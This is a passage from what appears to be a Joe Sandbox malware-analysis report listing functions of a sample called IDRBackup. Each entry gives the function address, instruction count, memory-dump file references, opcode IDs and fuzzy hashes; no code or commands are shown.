                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d68a046028d4ea755d48d8bf440a3e1feb3c029c7f97068efb76b5d48ddeaf51
                                                                                                  • Instruction ID: e6389e2d4f130a566ea5a8116b624573a766af97e2dbde44a3e1aa9483da6a51
                                                                                                  • Opcode Fuzzy Hash: d68a046028d4ea755d48d8bf440a3e1feb3c029c7f97068efb76b5d48ddeaf51
                                                                                                  • Instruction Fuzzy Hash: F071D73040C3C24EE70FDB78CABA525BF699F0B51470A55DBC486AF5B3C7906492DB62
                                                                                                  Function 5000DCEC Relevance: .2, Instructions: 189COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: df6b94dadef6be3c1e5a4f86748ccf45993b35100733b3d7265c2d7548da99fb
                                                                                                  • Instruction ID: c6c463696a87d4da3f4a7dcc969b068ecc595b8bd3b8d10637434b7a6a387777
                                                                                                  • Opcode Fuzzy Hash: df6b94dadef6be3c1e5a4f86748ccf45993b35100733b3d7265c2d7548da99fb
                                                                                                  • Instruction Fuzzy Hash: 4D7197705082C28FD70FDF68CABA521BF78AF0B61170A55DBC4864F5A3C7A06452DB62
                                                                                                  Function 5000F2E4 Relevance: .2, Instructions: 187COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 80378e959a7cb2c15ab34176bb159953e1498dc9de79dbdc9ce5628ee883ed25
                                                                                                  • Instruction ID: f1283e0734e9067825260d2f0601af00587d4d0a1c238bb49ff5f99635958643
                                                                                                  • Opcode Fuzzy Hash: 80378e959a7cb2c15ab34176bb159953e1498dc9de79dbdc9ce5628ee883ed25
                                                                                                  • Instruction Fuzzy Hash: 7F71D83040C3C24EE70FDB78CABA525BF699F0B51470A55DBC486AF4B3C7906492DB62
                                                                                                  Function 5000DCF4 Relevance: .2, Instructions: 187COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f336f071921c1deffaacc52c3fbc51a73977b4f1e45f8c6cc7bca039e13daeda
                                                                                                  • Instruction ID: aff02ff4e596728b37126d24b6feb0e7f20e944b2881405fbc199bd2ff895694
                                                                                                  • Opcode Fuzzy Hash: f336f071921c1deffaacc52c3fbc51a73977b4f1e45f8c6cc7bca039e13daeda
                                                                                                  • Instruction Fuzzy Hash: 4C71A5705082C28FD70F9F68CABA521BF78AF0B61170A55DBC4864F5A3C7A06452DB62
                                                                                                  Function 5000F2EC Relevance: .2, Instructions: 185COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d3196cdfe61973e1df95fbd4e3c6404e6db5a21c4807a53fab2a13f7f27f24d3
                                                                                                  • Instruction ID: a635fb495002b1fa6ad59cccb1ba20dfda2d42e362cbf6c4f26525b0dfad379b
                                                                                                  • Opcode Fuzzy Hash: d3196cdfe61973e1df95fbd4e3c6404e6db5a21c4807a53fab2a13f7f27f24d3
                                                                                                  • Instruction Fuzzy Hash: D471E73040C3C24EE70FDB78CABA525BF699F0B51470A55DBC486AF4B3C3906492DB62
                                                                                                  Function 5000DCFC Relevance: .2, Instructions: 185COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d6f28c979e5ff699d90389eb1482e26306fd29095d0ba2e42b49f52912b5cc80
                                                                                                  • Instruction ID: 632ebdf8c4e80e464696d5600a9d5517a794a74a362cfc9f4aa99e0d4827feaf
                                                                                                  • Opcode Fuzzy Hash: d6f28c979e5ff699d90389eb1482e26306fd29095d0ba2e42b49f52912b5cc80
                                                                                                  • Instruction Fuzzy Hash: 6371A47050C2C28FD70F9F68CABA521BF78AF0B61170A55DBC8864F4A3C7A06452DB22
                                                                                                  Function 5000F2F4 Relevance: .2, Instructions: 183COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bba6cc12655a4ca93616e249411b1fe39034da66fcf825181d80a802e35fa47f
                                                                                                  • Instruction ID: b80117d3c9cc2010ed02aace2a1880f8023a97cd760a4a8a8143f6286c2cb1a6
                                                                                                  • Opcode Fuzzy Hash: bba6cc12655a4ca93616e249411b1fe39034da66fcf825181d80a802e35fa47f
                                                                                                  • Instruction Fuzzy Hash: A071E73040C3C24EE70FDB78CABA525BF699F0B51470A55DBC486AF4B3C2906452DB62
                                                                                                  Function 5000DD04 Relevance: .2, Instructions: 183COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a24ab285e8210baaec5ba7c24cad2567c15d0afffefc3d4ec86d052c3240862e
                                                                                                  • Instruction ID: e9e4d168cb506e4d19d015b94a2b8867553e72034c85ec7158d8850bdee2f447
                                                                                                  • Opcode Fuzzy Hash: a24ab285e8210baaec5ba7c24cad2567c15d0afffefc3d4ec86d052c3240862e
                                                                                                  • Instruction Fuzzy Hash: ED71947150C2C28ED70F9F68CABA525BF78AF0B61170A55DBC8864F4A3C7A06452DB22
                                                                                                  Function 5000F2FC Relevance: .2, Instructions: 181COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f4d896bdf481e9000c02186237f80c106220750dc278a7fc936ee15101a7e37c
                                                                                                  • Instruction ID: a11d640b4bb9680e62f70268a3b797891413f54f48ac5fdda5ed72919d0e2944
                                                                                                  • Opcode Fuzzy Hash: f4d896bdf481e9000c02186237f80c106220750dc278a7fc936ee15101a7e37c
                                                                                                  • Instruction Fuzzy Hash: 3071F63040C3C24EE70FEB78CABA525BF6D9F0B51470A55DBC486AF4B3C2906852DB62
                                                                                                  Function 5000DD0C Relevance: .2, Instructions: 181COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5c7d7a8afe0f66953839ba0d591ee185f980b367a43c97055d8ae7a079148e8a
                                                                                                  • Instruction ID: f15b008373883dca17efc64f23f87784bf9db9f5fac34ee2802e9b22d9dce57a
                                                                                                  • Opcode Fuzzy Hash: 5c7d7a8afe0f66953839ba0d591ee185f980b367a43c97055d8ae7a079148e8a
                                                                                                  • Instruction Fuzzy Hash: DB71957150C2C28ED70F9F78CABA525BF78AF0B61170A55DBC8865F4B3C7A06452DB22
                                                                                                  Function 5000F304 Relevance: .2, Instructions: 179COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5f480fcb60482c1f735d2922d9cb765a4723add86f0036eeac60d6a29b57428c
                                                                                                  • Instruction ID: d1edfa83ea6befa6ba0f7e2a70f29aa9079fc2a9dc0cb0ac4140677165f10674
                                                                                                  • Opcode Fuzzy Hash: 5f480fcb60482c1f735d2922d9cb765a4723add86f0036eeac60d6a29b57428c
                                                                                                  • Instruction Fuzzy Hash: 6F71F53040C3C24ED70FEB78CABA521BF699F0B51470A55DBC486AF4B3C2906842DB62
                                                                                                  Function 5000DD14 Relevance: .2, Instructions: 179COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ba3e432b4e083c34034678db91aa4d0369d936bd2730ad969296dd81233f0ec7
                                                                                                  • Instruction ID: 2d7a8e7bf5f428d51be1d56c1917b69c19f1f8a9d96a60eda3087d960db9a654
                                                                                                  • Opcode Fuzzy Hash: ba3e432b4e083c34034678db91aa4d0369d936bd2730ad969296dd81233f0ec7
                                                                                                  • Instruction Fuzzy Hash: 0D71847150C2C28ED70F9F78CABA525BF78AF0B61170A55DBC4869F4B3C7A06452DB22
                                                                                                  Function 5000F30C Relevance: .2, Instructions: 177COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ca19611ee3cbc4005089650f54ea93ad1a36ab3eb2ccfe01c1dca5af9527e724
                                                                                                  • Instruction ID: df4dd0dfa5083b123c4582445d681a2a2a586d8616795fb32ef87ea88557f241
                                                                                                  • Opcode Fuzzy Hash: ca19611ee3cbc4005089650f54ea93ad1a36ab3eb2ccfe01c1dca5af9527e724
                                                                                                  • Instruction Fuzzy Hash: 7D61E37140C3C24ED70FEB788ABA911BF699F0B51470E56CBC486AF4B3C6906852DB62
                                                                                                  Function 5000DD1C Relevance: .2, Instructions: 177COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: abc6b11e87067304c92c2c1e109b7c062e8ad43041ba1f81f298fa8c65ad50e6
                                                                                                  • Instruction ID: f0c00c031784dec364f1ad882624c9a4130f079a8bd65a81d607442679c623d0
                                                                                                  • Opcode Fuzzy Hash: abc6b11e87067304c92c2c1e109b7c062e8ad43041ba1f81f298fa8c65ad50e6
                                                                                                  • Instruction Fuzzy Hash: 5F71837150C2C28ED70F9F78CABA525BF78AF0B61170A55DBC4869F4B3C7A06452DB22
                                                                                                  Function 5000F314 Relevance: .2, Instructions: 175COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: fb5c2b24833f8858918156b1e329fdc8cb702be7f90d728338c3e7cd29505e22
                                                                                                  • Instruction ID: 9225bef96d409bbe89d64ea15d5ccd9c372acae3ccc2f5ff3bfb461466962ed0
                                                                                                  • Opcode Fuzzy Hash: fb5c2b24833f8858918156b1e329fdc8cb702be7f90d728338c3e7cd29505e22
                                                                                                  • Instruction Fuzzy Hash: 8461D57140C3C24ED70FDB788ABA515BF6D9F0B51470E55CBC486AF4B3C6906452DB62
                                                                                                  Function 5000DD24 Relevance: .2, Instructions: 175COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
